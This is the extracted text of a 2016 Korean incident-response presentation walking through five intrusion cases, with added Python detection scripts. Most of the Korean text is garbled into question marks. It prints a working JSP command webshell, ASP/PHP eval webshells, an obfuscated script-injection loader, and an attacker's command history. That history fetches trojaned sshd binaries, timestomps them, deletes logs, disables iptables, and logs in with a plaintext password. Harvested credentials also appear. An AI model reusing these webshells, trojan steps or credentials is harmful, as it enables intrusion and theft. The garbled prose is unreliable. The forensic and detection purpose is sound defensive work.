???? ??
'16.4.22
KISA ??1? ???
???? ?? ??, EnCE/CISA/ISMS/CPPG
F-INSIGHT CONFERENCE 2016
???? ???~
?? ??
??
Case ??
? ?? ??(?? ??)
? ???? ??(??? ?)
? ?? ??(?? No, Profiling)
? ?? ??(Collabo)
Think...
Episode
?? ??
? ????? ??? ??? ??? ?? ?? ? ?? ??
- ??? ??? ?? : Rapid Image, Magic Cube
- ?? ?? ?? : Encase 7, FTK, F-EXPLORER
????1st Case
??? ???? ??? ? ? ??
??? ???? ??? ? ? ??
?? ??
DNS
?? ??
????
??
???
?? ??
?? ?????
Keyword1st Case
?? ?????1st Case ????
180.131.1.79(koreaboxoffice.com / ??????) -> rafomedia.com(158.85.62.205) ->
adrotate.se(83.140.162.230)
-> pops.ero-advertising.com(185.70.212.101) -> spaces.slimspots.com(176.31.224.189) ->
aff.camplace.com
?? ?????1st Case ????
180.x.x.79(korOOOice.com)
-> rafomedia.com(158.85.62.205)
-> adrotate.se(83.140.162.230)
-> pops.ero-advertising.com(185.70.212.101)
-> spaces.slimspots.com(176.31.224.189)
-> aff.camplace.com
?? ?????1st Case ????
??? ???? ??? ? ? ??
?? ??? ?? ? ???.
??? ????? ????
Episode
2nd Case ???? ??
??? ??. ??? ??? ??
?? ??
?? ??
?? ??
?? ??
???
???
??? ? ??
2nd Case Keyword
117.x.x.188(??, VPN)
211. x.x.19(??, VPN)
211. x.x.3(??, VPN)
211. x.x.203(??)
210.x.x.22(??)
116.x.x.1~116.x.x.255(??)
???(213)
hoxxy.OOO.com
???(222)
www.OOO.com
????(209)
file.OOO.com
????(223)
hoxxdata.OOO.com
211.x47.x0.51(KR)
???? ??(??? ??)
?? ???
FTP ??(??? ??)
?? ???
DB??(210)
211.x34.x2.202(KR)
????
OO?? ???
58.x.162.x
win ?? 13?
linux ?? ???
2nd Case ??? ? ?? ??? ?
<213? ??> D:OnmamWebSiteSourcehomxx.OOO.com/common/js/prototype.js
<222? ???> D:OnmamWebSiteSourceimages.OOO.comCommon_jsYUtil.js
myOOO.co.kr/test/f/ck.gif
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4.3("<0 2=1://5.b.6.a/9/8.7></0>");',12,12,'script|http|src|write|document|itoy|co|gif|all|images|kr|dbros'.split('|'),0,{}))
--> ??? ??
document.write("<script src=http://itoy.dbOOO.co.kr/images/all.gif></script>");
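The loader above is the p,a,c,k,e,d packer: the list after split('|') holds the real tokens, and every base-a symbol in the payload is swapped back with a whole-word regex, highest slot first. The Python below is an added example, not code from the slides or from the incident. It reproduces that substitution offline on a constructed copy of the page's packed string in which the injected script's domain is masked as dbOOO, the way the decoded line above masks it, and then lists any script src that does not end in .js, since a JavaScript file served as all.gif is the giveaway in this case.

```python
import re

# Constructed sample: the packed loader quoted on the page, with the injected
# script's second-level domain masked as "dbOOO" to match the page's own redaction.
PACKED_SAMPLE = (
    r'''eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};'''
    r'''if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}'''
    r'''k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};'''
    r'''while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}'''
    r'''return p}('4.3("<0 2=1://5.b.6.a/9/8.7></0>");',12,12,'script|http|src|write|'''
    r'''document|itoy|co|gif|all|images|kr|dbOOO'.split('|'),0,{}))'''
)

# The trailing call of the packer: }('payload', base, count, 'w1|w2|...'.split('|'), ...
_TAIL = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*"
    r"'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)",
    re.S,
)
_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}
_DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"
_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)


def _js_unescape(s):
    """Undo the backslash escapes a JS single-quoted string literal may carry."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def symbol(index, base):
    """The packer's e(): name of dictionary slot `index` written in base `base`.
    Digits run 0-9, a-z, then A-Z for bases above 36 (chr(d + 29) in the packer)."""
    digit = index % base
    head = symbol(index // base, base) if index >= base else ""
    return head + (chr(digit + 29) if digit > 35 else _DIGITS[digit])


def unpack(packed):
    """Replace every base-`base` symbol in the payload with its dictionary word.
    Runs highest slot first with \\b boundaries, exactly like the packer's while(c--)."""
    m = _TAIL.search(packed)
    if m is None:
        raise ValueError("no p,a,c,k,e,d packer call found")
    payload, base, count = _js_unescape(m.group(1)), int(m.group(2)), int(m.group(3))
    words = _js_unescape(m.group(4)).split("|")
    for i in range(count - 1, -1, -1):
        if i < len(words) and words[i]:
            token = re.compile(r"\b" + re.escape(symbol(i, base)) + r"\b")
            payload = token.sub(lambda _m, w=words[i]: w, payload)
    return payload


def script_sources(markup):
    """All <script src=...> targets in the decoded output."""
    return _SRC.findall(markup)


def odd_script_sources(markup):
    """Script tags whose source does not look like a JavaScript file (.gif, .jpg, ...)."""
    return [u for u in script_sources(markup) if not u.lower().split("?")[0].endswith(".js")]


if __name__ == "__main__":
    decoded = unpack(PACKED_SAMPLE)
    print(decoded)
    for url in odd_script_sources(decoded):
        print("script loaded from a non-.js URL:", url)
```

The unpacker only parses the packer's trailing call and never evaluates the JavaScript, so it is safe to run on a file pulled from a compromised web root; the same routine handles payloads packed with base 62, where the symbols run past 0-9a-z into A-Z.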
2015-04-20 17:16:17 W3SVC678852465 58.x.x.213 POST /customer/con.asp(??) - 80 - 117.x.x.188(??, VPN) Mozilla/4.0+(compatible;+MSIE+8.0;+Windows+NT+5.2;+Trident/4.0;+qdesk+2.4.1264.203;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.30;+.NET+CLR+3.0.4506.2152;+.NET+CLR+3.5.30729) 200 0 0
2nd Case ??? ? ?? ??? ?
?? ??? ?? IIS? ????? ???? ??
2nd Case ??? ? ?? ??? ?
??? ??? ?? ???? ??? ?? ?? ???
2nd Case ??? ? ?? ??? ?
???? ?? ?? ?? ? 209? ???? 222? ??? FTP ??, ?? ?? ???
2nd Case ??? ? ?? ??? ?
209? ?? ????, ?? C&C? ?????? ?? ??
2nd Case ??? ? ?? ??? ?
??? ?? ???? ????? Cain.exe ???? ??
Cain.exe ?? ??? ???? ??? ??? ?? ??? ???? ???? ??? ?? ??
isangwhang.com/data/goodsimages/fxp.exe <?? : 2015-04-28 18:40:58>
ischoolplus.com/css/zx.exe <?? : 2015-04-28 23:07:31>
isangwhang.com/data/goodsimages/cain.exe <?? : 2015-04-28 23:15:37>
209? ???? ???? ?? ?? - ???? ?? ???? ??? ??
2nd Case ??? ? ?? ??? ?
????? ?? ??? ??? ????? ?? - 223? ???? 209? ??? ????? ??
223? ???? : 209? ??? ???? ????? ??, ?? C&C? ???? ??
※ ???? ? : lss.jpg(????? HTran ????)
※ C&C : 211.x.x.202:443(??)
2nd Case ??? ? ?? ??? ?
C2? ??? ?? ?? ?? - 211.x47.x0.51(OO?? DB??)
2nd Case ??? ? ?? ??? ?
??? ??. ??? ??? ??
???? ? ??? ??
Episode
3rd Case ?? ??
??? ????, ??? ?? ??
??? PC
????
?? ??????
??
?? ??
????
?? ? ??
????
3rd Case Keyword
3rd Case ?? ? ?? ??? ??
3rd Case
?????? ???? DDoS ????
??? ???? ? ??
3rd Case
2013-07-10 10:23:10,134 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099,
rmiPort=1098, backlog=50, bindAddress=/0.0.0.0,
2013-07-10 10:23:14,293 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL
service available at : /0.0.0.0:8093
......(??)
2015-07-30 15:48:09,072 INFO [org.jboss.naming.NamingService] Started jndi bootstrap jnpPort=1099,
rmiPort=1098, backlog=50, bindAddress=/0.0.0.0,
2015-07-30 15:48:12,589 INFO [org.jboss.mq.il.uil2.UILServerILService] JBossMQ UIL
service available at : /0.0.0.0:8093
??? ???? ? ??
3rd Case
2013-09-21 06:50:54,798 INFO [org.jboss.web.tomcat.tc5.TomcatDeployer] deploy, //???
ctxPath=/webconsole, //???
warUrl=file:/usr/local/jboss/server/default/deploy/management/webconsole.war/ //??
??? ???? ? ??
3rd Case
<%@page import="java.io.*"%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd"><INPUT TYPE="submit" VALUE="Execute">
</FORM>
<PRE>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command:" + request.getParameter("cmd"));
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) { out.println(disr); disr = dis.readLine(); }
}
%>
</BODY></HTML></pre>
?? ? ?? ??? ??
3rd Case
?? Jboss ??? ??? ???? ?? ?? ?? ? ??
?? 5?, ???? 58?, ??? 1?, IRC bot 1?, DDoS ?? ???? 1? ??
DDoS ???? ?? ? ???? ?? ?? ?? ?
??? ???? ? ??
3rd Case
???
??? ???? ? ??
3rd Case
/tmp/.1/ ??? ??? [energy mech 2.8] IRC bot
http://www.energymech.net/index.html
??? ???? ? ??
??? ??. ??? ??? ??
??? ??? ??? ?? ???
Episode
4th Case Profiling
???? ???? ????
?? ??
??
?? ??
??
C2 ??
??
?? ??
??
?? ??
?? ??
??
?? ??
??
4th Case Keyword
cd /tmp/xxx/temp/; wget http://www.OOO.com/xxx/aa.gif
wget http://www.OOO.com/xxx/bb.gif
wget http://www.OOO.com/xxx/cc.gif
mv aa.gif sshd; mv bb.gif ssh; mv cc.gif scp; chmod 755 sshd ssh scp;ls -al
cd /usr/sbin/; mv sshd sshd.bak; cd /usr/bin/; mv scp scp.bak; mv ssh ssh.bak
cd /tmp/xxx/temp/; cp sshd /usr/sbin/sshd; cp ssh /usr/bin/ssh; cp scp /usr/bin/scp
/etc/init.d/sshd restart
ssh 127.0.0.1
cd /usr/bin/; touch -r scp.bak scp ssh; rm -f *.bak; ls -al scp ssh
cd /usr/sbin/; touch -r sshd.bak sshd; rm -f sshd.bak; ls -al sshd
4th Case ?? ?? ?? Profiling
SSH ???
[root@ksxxxx backup_virus]# strings /usr/sbin/sshd | more
Bad options in %.100s file, line %lu: %.50s
KiTrap0DExp!!! --> ???? ???? ????? ?? ???? ????
/usr/share/ssh//slog --> ???? ??? ???? ??? ??
%s:%s --> ??? ??
trying public RSA key file %s
auth-rsa.c
[root@ksxxxx- ssh]# cat slog | tail
www:prin****
www:prince4025
root:rlawl****
root:wwlas****
root:eel!****
root:lliet****
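The strings output is what gives the swapped sshd away: a hard-coded log path under /usr/share, a user:password format string and a marker that no OpenSSH build contains. The touch -r / rm *.bak sequence in the command history copies the original mtime onto the new binaries so that ls -l shows nothing unusual; what touch cannot forge is ctime, which the kernel sets itself. The Python below is an added example, not material from the talk: a strings(1)-style scan for such indicators, a ctime comparison against files the same package installed, and a name-versus-content check for a coreutil that is really an SSH client (the /usr/bin/umount used later in this case). The indicator patterns, the marker lists and the sample bytes are this example's assumptions, built from the strings shown above.

```python
import os
import re

# Heuristic indicators for a replaced sshd/ssh/scp (assumptions for this example,
# derived from the strings quoted on the page, not a signature of a specific family).
INDICATORS = (
    (re.compile(r"^/(usr/share|var/lib|var/tmp|tmp|dev/shm)/\S*$"),
     "hard-coded path under a directory sshd never writes to"),
    (re.compile(r"/\.[^/\s]+"), "path with a hidden (dot) component"),
    (re.compile(r"^%s:%s$"), "user:password style format string"),
    (re.compile(r"KiTrap0D|@root", re.I), "marker string seen in this case"),
)
# Strings an OpenSSH client carries; in a file called umount they mean the name lies.
SSH_CLIENT_MARKERS = ("OpenSSH", "ssh_config", "Host key verification")
COREUTIL_NAMES = {"mount", "umount", "ls", "ps", "netstat", "lsof", "find"}


def printable_strings(data, min_len=4):
    """Equivalent of strings(1): runs of printable ASCII at least min_len bytes long."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def indicators(data):
    """(string, reason) for every printable string that matches an indicator."""
    hits = []
    for s in printable_strings(data):
        for pattern, reason in INDICATORS:
            if pattern.search(s):
                hits.append((s, reason))
                break
    return hits


def masquerading(name, data):
    """True when a file named like a coreutil carries OpenSSH client strings."""
    if os.path.basename(name) not in COREUTIL_NAMES:
        return False
    text = "\n".join(printable_strings(data))
    return any(marker in text for marker in SSH_CLIENT_MARKERS)


def ctime_outlier(target_ctime, sibling_ctimes, slack_seconds=600):
    """touch -r forges atime/mtime, but ctime is stamped by the kernel and cannot be
    backdated from user space. Files laid down by one package install share a ctime
    within seconds, so a binary whose ctime is far later than its package siblings
    was rewritten after the install. Returns the gap in seconds, or None."""
    if not sibling_ctimes:
        return None
    gap = target_ctime - max(sibling_ctimes)
    return gap if gap > slack_seconds else None


def triage(path, siblings=()):
    """All three checks on a real file; siblings are other files from the same package
    (for sshd on RHEL/CentOS: rpm -ql openssh-server)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "indicators": indicators(data),
        "masquerading": masquerading(path, data),
        "ctime_gap": ctime_outlier(os.stat(path).st_ctime,
                                   [os.stat(s).st_ctime for s in siblings]),
    }


# Constructed samples: an ELF-like blob with the strings reported on the page, and a
# fake "umount" that is really an ssh client.
SAMPLE_SSHD = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 +
               b"Bad options in %.100s file, line %lu: %.50s\x00"
               b"KiTrap0DExp!!!\x00/usr/share/ssh//slog\x00%s:%s\x00"
               b"trying public RSA key file %s\x00auth-rsa.c\x00")
SAMPLE_UMOUNT = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 +
                 b"usage: ssh [-1246AaCfgKkMNnqsTtVvXxYy] [-b bind_address]\x00"
                 b"OpenSSH_5.3p1\x00ssh_config\x00")

if __name__ == "__main__":
    for s, why in indicators(SAMPLE_SSHD):
        print("%-28s %s" % (s, why))
    print("umount is an ssh client:", masquerading("/usr/bin/umount", SAMPLE_UMOUNT))
    # Live use on a suspect host (paths are examples):
    # print(triage("/usr/sbin/sshd", ["/usr/sbin/sshd-keygen", "/etc/pam.d/sshd"]))
```

The ctime check is the one that survives the timestomping in this case, but it needs a baseline: compare against files from the same package rather than against an absolute date, since on RPM systems ctime is normally the install time while mtime is the build time. rpm -V openssh-server is the complementary check when the package database itself is trusted.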
4th Case ?? ?? ?? Profiling
SSH ???
4th Case ?? ?? ?? Profiling
SSH ???
usb-spi.ko ??? TCP ?? ??? ? 'fuck@root' ???? ?
?? ??? ???? /var/lib/nfs/statd/dm/libijs.so ??
??? ??
/lib/modules/2.6.18-404.el5/kernel/sound/usb/usb-spi.ko
/var/lib/nfs/statd/dm/libijs.so
/var/lib/nfs/statd/dm/libijs2.so
libijs.so ??? ???? ??? IP??? ??? ?? ??
4th Case ?? ?? ?? Profiling
???
/proc ?? ??? ?? ??? ???? ?? ??
cmdline : ??? ????
cwd : ?? ?? ????
maps : ?? ??? ?????? ?? ???
?
mem : ???? ???
status : ???? ??
environ : ????? ??? ????
exe : ????? ????
fd : ????? ???? ?? ??
root : ???? ?? ????
4th Case ?? ?? ?? Profiling
???
/proc ?? ??? ?? ??? ???? ?? ??
for PID in $(./chkproc -v | grep "PID" | grep "/" | awk -F "(" '{print $1}' | awk '{print $2}');
do echo -n "PID[$PID]"; ls -al /proc/$PID |grep exe |awk '{print "exe -> "$11}'; done
4th Case ?? ?? ?? Profiling
???
/proc ?? ??? ?? ??? ???? ?? ??
for PID in $(find ./ -name exe | grep -v task | awk -F "/" '{print $2}'); do echo -n "PID[$PID]";
ls -al /proc/$PID | grep exe |awk '{print "exe -> "$11}';done
4th Case ?? ?? ?? Profiling
???
/usr/bin/umount -l root -p 22 -z dkagh#@!220.x.x.25
"cd /root/; mv .bash_history .bash_history.bak; ls -al"
/usr/bin/umount -l root -p 22 -z dkagh#@! 220.x.x.25
"cd /var/log/; mv wtmp wtmp.bak; mv lastlog lastlog.bak; mv secure secure.bak; ls -al *.bak"
/usr/bin/umount -l root -p 22 -z dkagh#@! 220.x.x.25
"/etc/init.d/iptables stop"
/usr/bin/umount -l root -p 22 -z dkagh#@! 220.x.x.28
…
/usr/bin/umount -l root -p 22 -z dkagh#@! 220.x.x.29
…
/usr/bin/umount -l root -p 22 -z dkagh#@! 220.x.x.35
…
/usr/bin/umount -l root -p 22 -z dkagh#@! 220.x.x.36
4th Case ?? ?? ?? Profiling
?? ????? ?? ???? ??? ????
4th Case ?? ?? ?? Profiling
http://www.boutell.com/rinetd/
4th Case C2 ?? ?? Profiling
C&C?? ??? DB -1
4th Case C2 ?? ?? Profiling
4th Case ?? ?? ?? Profiling
<%eval request("*0#")%>
<?php eval($_POST[ad]);?>
<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"""mFpECU"""&")"&")")%>
<?php preg_replace("//e",str_replace('%','v'.'a','e'.'%'.'l($_R'.'E'.'Q'.'U'.'E'.'S'.'T'.'[s'.'m'.'s'.'])'),"");?>
<?php eval($_POST[cmd]);?><?ob_start();?><?ob_start();?> <?ob_start();?>
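The five one-liners above show why a literal grep for eval is not enough: the third one builds "eval(request(" from single-character VBScript concatenations, and the fourth hides it behind preg_replace's /e modifier and str_replace. The Python scanner below is an added example, not a tool from the talk. It lower-cases each file and strips quotes, concatenation operators and whitespace before matching, so that the obfuscated forms collapse onto the same few patterns, and it also catches the JSP webshell quoted in the 3rd case. The rule names, extension list and the constructed sample tree (the page's one-liners plus one benign file) are this example's assumptions.

```python
import os
import re
import tempfile

# Rules run against the normalized source: lower-cased, with quotes, &, ., + and
# whitespace removed, so "e"&"v"&"a"&"l" and 'e'.'v'.'a'.'l' both read as eval.
RULES = (
    ("asp_eval_request", re.compile(r"(eval|execute|executeglobal)\(?request\(")),
    ("php_eval_input", re.compile(r"(eval|assert)\(\$_(post|get|request|cookie)\[")),
    ("php_preg_replace_e", re.compile(r"preg_replace\(/[^,]*/[a-z]*e[a-z]*,")),
    ("jsp_runtime_exec", re.compile(r"getruntime\(\)exec\(requestgetparameter\(")),
)
EXTENSIONS = (".asp", ".aspx", ".asa", ".cer", ".ashx", ".php", ".jsp", ".jspx")


def normalize(src):
    """Collapse string-concatenation obfuscation: drop quotes, & . + and whitespace."""
    return re.sub(r"[\"'&.+\s]", "", src.lower())


def scan_text(src):
    """Names of all rules that fire on the normalized source."""
    norm = normalize(src)
    return [name for name, rule in RULES if rule.search(norm)]


def scan_file(path):
    with open(path, "rb") as fh:
        return scan_text(fh.read().decode("utf-8", "ignore"))


def scan_tree(root):
    """Map every script file under root that matches a rule to its rule names."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(dirpath, name)
                hits = scan_file(path)
                if hits:
                    found[os.path.relpath(path, root)] = hits
    return found


# Constructed samples: the one-liners quoted on the page plus one benign file.
SAMPLES = {
    "a.asp": '<%eval request("*0#")%>',
    "b.php": "<?php eval($_POST[ad]);?>",
    "c.asp": '<%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("'
             '&"""mFpECU"""&")"&")")%>',
    "d.php": '''<?php preg_replace("//e",str_replace('%','v'.'a','e'.'%'.'l($_R'.'E'.'Q'.'U'''
             ''''.'E'.'S'.'T'.'[s'.'m'.'s'.'])'),"");?>''',
    "e.php": "<?php eval($_POST[cmd]);?><?ob_start();?><?ob_start();?> <?ob_start();?>",
    "ok.php": "<?php echo htmlspecialchars($_POST['name']); ?>",
}


def demo():
    """Write the samples into a temporary web root, scan it, and return {file: rules}."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, rules in sorted(demo().items()):
        print(path, rules)
```

Normalization is deliberately lossy: it cannot follow the fourth sample's runtime str_replace, so that file is caught on the /e modifier alone, and a shell that decodes its payload from base64 or a cookie needs a rule of its own. Pair the scan with the file-timeline from the web server logs (which files were created around the POSTs to con.asp) rather than relying on it alone.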
4th Case ?? ?? ?? Profiling
? ?? ???? ?? ?? ??
? ?? ?? ???? ?? ??
4th Case ?? ?? ?? Profiling
??? API? ??
4th Case ?? ?? ?? Profiling
??? ??
??? ??. ??? ??? ??
???? ??? ??? ?? ???
Episode
5th Case ?? ??
Cooperation ? Collaboration
???
?? Web
???
?? ????
DB ??
??? ??
??, ??
???
???
???
??
5th Case Keyword
??
??
5th Case
Scrum vs Kanban.hwp
61.x.x.251 port : 443 (C&C, )
122.x.x.214 port : 443 (C&C)
15?? ?????? ???.hwp
203.x.x.163 port : 443,8443 (C&C)
196.x.x.106 port : 443, 8443 (C&C)
??? ?? Collabo
5th Case ??? ?? Collabo
5th Case
① ??? ???? ?? ???? ???? ??
② ????? ??
③ ??? PC? ??????? ?? RAT ??
④ ?? ???? ?? ?? ????? ??
??? ??
??? ??? ???? ActiveX ???? ??? ??
??… ??... ??…
Collabo
5th Case ??? ??
[root@exxx bin]# stat /lib/libcom.so.3.0.1
File: `/lib/libcom.so.3.0.1'
Access: (0755/-rwxr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
??? preload (/etc/ld.so.preload) - ?? ????? so ?? ???
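The /proc walk in the 4th case (cmdline, cwd, exe, the chkproc loop that lists every PID's exe link) and the /etc/ld.so.preload entry in this case are two halves of the same triage: a preloaded library hooks readdir() in every dynamically linked tool, so ps and ls no longer see what the kernel still serves by direct path lookup. The Python below is an added example, not a tool from the talk, and it serves both passages: it brute-forces PIDs through stat()/open() of /proc/<pid>/status instead of readdir() and reports the difference, classifies each process from its exe link and cmdline (deleted or /tmp binaries, hidden directories, argv[0] that disagrees with the exe name), and parses ld.so.preload, where any entry at all needs an explanation. The flag wording, the path lists and the probe limit are this example's assumptions; because Python itself links libc, run it from a statically linked interpreter or against an offline-mounted disk when a preload rootkit is in play.

```python
import json
import os
import re

TMP_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")
LIB_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/local/lib/")


def classify(exe, cmdline):
    """Flags for one process from its /proc/<pid>/exe link target and raw cmdline.
    Kernel threads have neither; everything else has both and they should agree."""
    reasons = []
    if not exe:
        return reasons                       # kernel thread, zombie, or no permission
    path = exe.replace(" (deleted)", "")
    if exe.endswith(" (deleted)"):
        reasons.append("exe deleted from disk")
    if path.startswith(TMP_PREFIXES):
        reasons.append("exe under a world-writable temp location")
    if re.search(r"/\.[^/]", path):
        reasons.append("exe in hidden directory")
    argv0 = cmdline.split("\x00")[0] if cmdline else ""
    if not argv0:
        reasons.append("cmdline empty but exe present (argv wiped)")
    else:
        shown, real = os.path.basename(argv0.lstrip("-")), os.path.basename(path)
        # prefix match tolerates python3 -> python3.11 style interpreter symlinks
        if not (shown.startswith(real) or real.startswith(shown)):
            reasons.append("argv[0] does not match exe name")
    return reasons


def hidden_pids(listed, probed):
    """PIDs reachable by direct path lookup but absent from a readdir() of /proc."""
    return sorted(set(probed) - set(listed))


def probe_proc(limit):
    """Brute-force PIDs 1..limit by opening /proc/<pid>/status rather than listing
    /proc; keep only thread-group leaders (Tgid == Pid) so bare thread ids, which
    are legitimately absent from the listing, do not show up as hidden."""
    found = set()
    for pid in range(1, limit + 1):
        try:
            with open("/proc/%d/status" % pid) as fh:
                fields = dict(line.split(":", 1) for line in fh if ":" in line)
        except OSError:
            continue
        if fields.get("Tgid", "").strip() == str(pid):
            found.add(pid)
    return found


def preload_entries(text):
    """/etc/ld.so.preload is a whitespace-separated list of shared objects."""
    return text.split()


def check_preload(entries, exists=os.path.exists):
    """Every entry is reported; extra reasons for missing, odd or hidden paths."""
    findings = []
    for lib in entries:
        why = ["preload entry present (any entry needs a justification)"]
        if not exists(lib):
            why.append("missing on disk")
        if not lib.startswith(LIB_PREFIXES):
            why.append("outside standard library directories")
        if re.search(r"/\.[^/]", lib):
            why.append("hidden path component")
        findings.append((lib, why))
    return findings


def scan_live(pid_limit=65536):
    """Walk /proc on a Linux host; run as root so every exe link is readable.
    Raise pid_limit to /proc/sys/kernel/pid_max for full coverage (slower)."""
    listed = {int(d) for d in os.listdir("/proc") if d.isdigit()}
    report = {"hidden_pids": hidden_pids(listed, probe_proc(pid_limit)),
              "processes": [], "preload": []}
    for pid in sorted(listed):
        try:
            exe = os.readlink("/proc/%d/exe" % pid)
        except OSError:
            exe = ""
        try:
            with open("/proc/%d/cmdline" % pid, "rb") as fh:
                cmdline = fh.read().decode("utf-8", "replace")
        except OSError:
            cmdline = ""
        reasons = classify(exe, cmdline)
        if reasons:
            report["processes"].append((pid, exe, reasons))
    try:
        with open("/etc/ld.so.preload") as fh:
            report["preload"] = check_preload(preload_entries(fh.read()))
    except OSError:
        pass                                  # absent is the normal state
    return report


if __name__ == "__main__":
    print(json.dumps(scan_live(), indent=1))
```

A process that shows up in hidden_pids with an exe under /tmp/.1/ is exactly the IRC bot of the 3rd case; a kernel module such as the usb-spi.ko of the 4th case hides from both code paths, so an empty report from a live host is not a clean bill of health, only the absence of a userland hook.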
Collabo
??? ?? C2
'15.4.25
27.x55.78.x
??????
'15.7.7
APT C2
???
zhongwei wang
26815139@
27.x55.84.x
'15.1.22
27.x55.67.x
??? & ???? C2
'14.12.10
27.x55.71.x
5th Case ?? ?? Collabo
[Bar chart: values 76, 8, 16; categories 1??~3??, 4??~6??, 6??~1?; axis 0-80]
?? ???? ???? ???? ??? ?? ??
??? ?? ???
??? ??(50??) ??
5th Case Log... Collabo
??? ??. ??? ??? ??
?? ??? ?? ?? ?? ????
Episode
? ???? ??? ????(???, ????, ????)
? ??? ?? ??? ?? ??? ?? ??(?????? ????)
? ?? ?? ?? ?? ?? ??
? ??? ? ?????/DB??/???? ? ??? ?? ??
? ???? ???? ? ?? ??
? ??? ???
?? ?. Think... NOPASIM
? ???? ??? ??? ?? ?? ?? ? ?? ??
? ?? ?? ??? Risk
? ?? ???? ?? ?? / ??? ?? ?? ??
? ????? ???
? ???? ?? ???? ?? ??
? Defensive Security? ??
?? ?. Think... NOPASIM
(Ficon2016) #2 ???? ??, ???? ???
